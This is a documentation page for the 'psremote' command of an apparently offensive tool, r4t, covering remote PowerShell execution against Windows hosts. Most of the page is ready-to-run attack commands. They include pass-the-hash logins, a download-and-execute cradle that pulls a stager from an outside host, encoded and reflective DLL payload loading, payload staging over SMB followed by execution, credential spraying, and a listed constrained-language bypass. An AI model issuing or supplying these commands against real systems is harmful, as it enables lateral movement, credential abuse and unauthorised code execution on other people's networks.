Documentation Index
Fetch the complete documentation index at: https://wiki.krkn.tech/llms.txt
Use this file to discover all available pages before exploring further.
psremote
The psremote command provides PowerShell Remoting operations for remote command execution, script delivery, and interactive sessions over WS-Management.
Usage
r4t psremote <subcommand> [flags]
Overview
PowerShell Remoting (PSRemote) is a protocol built on top of WS-Management (WinRM) that enables operators to execute PowerShell commands and scripts on remote Windows hosts. It operates over HTTP (port 5985) or HTTPS (port 5986) and is one of the most common administrative remote access methods in Windows enterprise environments.
PSRemote is distinct from raw WinRM command execution — it provides a full PowerShell runspace on the remote host, enabling cmdlet execution, pipeline operations, and module loading that are not possible through basic cmd.exe execution.
Planned Capabilities
| Capability | Description |
|---|
| Command Execution | Execute PowerShell commands on remote hosts |
| Script Execution | Run PowerShell script files (.ps1) remotely |
| Interactive Session | Establish an interactive PowerShell Remoting session |
| Constrained Language Bypass | Execute in Full Language Mode where possible |
| Module Loading | Import and execute PowerShell modules remotely |
Authentication
PSRemote uses the same global authentication flags as all other R4t commands. The following authentication methods are supported:
| Method | Flag | Description |
|---|
| Password | -u / -p | Domain username and password |
| NTLM Hash | --hash | Pass-the-hash via NT hash |
| Kerberos | --aes / --ccache | Kerberos authentication via AES key or ccache |
| Certificate (PFX) | --pfx | PFX certificate authentication |
| Certificate (PEM) | --cert / --key | PEM certificate and key authentication |
| Anonymous | --anonymous | Unauthenticated access |
# Execute a PowerShell command
r4t psremote exec -u admin -p 'P@ssw0rd' -d corp.example.com 10.10.10.20 \
"Get-Process | Select-Object -First 10"
# Run a script file
r4t psremote exec -u admin -p 'P@ssw0rd' -d corp.example.com 10.10.10.20 \
-f ./enum-script.ps1
# Use NTLM hash authentication
r4t psremote exec -u admin --hash aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0 \
10.10.10.20 "whoami /all"
# Use Kerberos via ccache
r4t psremote exec --ccache /tmp/krb5cc_admin -d corp.example.com 10.10.10.20 \
"Get-ADUser -Filter * | Select-Object Name, Enabled"
# Use stored credentials
r4t psremote exec --credential-id 1 10.10.10.20 "hostname"
Connection Details
| Property | Value |
|---|
| Protocol | PowerShell Remoting over WS-Management |
| HTTP Port | 5985 |
| HTTPS Port | 5986 |
| Authentication | NTLM, Kerberos, Basic, Certificate |
| Remote Shell | Full PowerShell runspace |
| Access Group | Remote Management Users (RID 580) |
Payload Execution via PSRemote
PSRemote is a primary execution channel for delivering payloads to remote hosts. Its PowerShell runspace enables both fileless in-memory execution and disk-based delivery.
Fileless Execution
# Download and execute in memory (cradle)
r4t psremote exec -u admin -p 'P@ssw0rd' -d corp.example.com 10.10.10.20 \
"IEX(New-Object Net.WebClient).DownloadString('http://10.10.10.5/stager.ps1')"
# Encoded command execution
r4t psremote exec -u admin -p 'P@ssw0rd' -d corp.example.com 10.10.10.20 \
--encoded "<base64-encoded-powershell>"
# Reflective DLL loading via PowerShell
r4t psremote exec -u admin -p 'P@ssw0rd' -d corp.example.com 10.10.10.20 \
"[System.Reflection.Assembly]::Load([Convert]::FromBase64String('<b64-dll>'))"
Disk-Based Execution
# Stage payload via SMB, execute via PSRemote
r4t smb put -u admin -p 'P@ssw0rd' -d corp.example.com 10.10.10.20 \
./payload.exe C:\Windows\Temp\svc.exe
r4t psremote exec -u admin -p 'P@ssw0rd' -d corp.example.com 10.10.10.20 \
"Start-Process C:\Windows\Temp\svc.exe"
Payload Factory Integration
When the payload factory is operational, PSRemote execution modules will request artifacts by capability:
| Capability Request | Use Case |
|---|
execution=script, type=ps1 | PowerShell stager for direct execution |
inmemory=true, execution=script | Fileless execution via encoded PowerShell |
reflective=true, execution=reflective-load | Reflective DLL loaded via [Reflection.Assembly]::Load |
execution=self-exec, os=windows | Standard EXE executed after file transfer |
type=shellcode, inmemory=true | Shellcode injected via PowerShell process injection |
Remote Management Users (RID 580)
Access to PSRemote on a host is controlled by membership in the Remote Management Users local group (RID 580). By default, only members of this group (and local Administrators) can establish PowerShell Remoting sessions.
This group is critical for attack path analysis — any user with Remote Management Users membership on a host can execute arbitrary PowerShell commands there.
Spray Integration
PSRemote credential validation can be tested through the WinRM spray protocol, since PSRemote operates over WinRM:
# Spray PSRemote/WinRM targets
r4t spray winrm 10.10.10.20 10.10.10.21
# Spray with stored users
r4t spray winrm --db-users --stop-on-lockout 10.10.10.20
winrm — Raw WinRM command execution (cmd.exe level)wmi — WMI remote execution (alternative lateral movement)smb — SMB file operations (payload staging)spray — Multi-protocol credential sprayingbloodhound — BloodHound collection (includes psremote collection method)
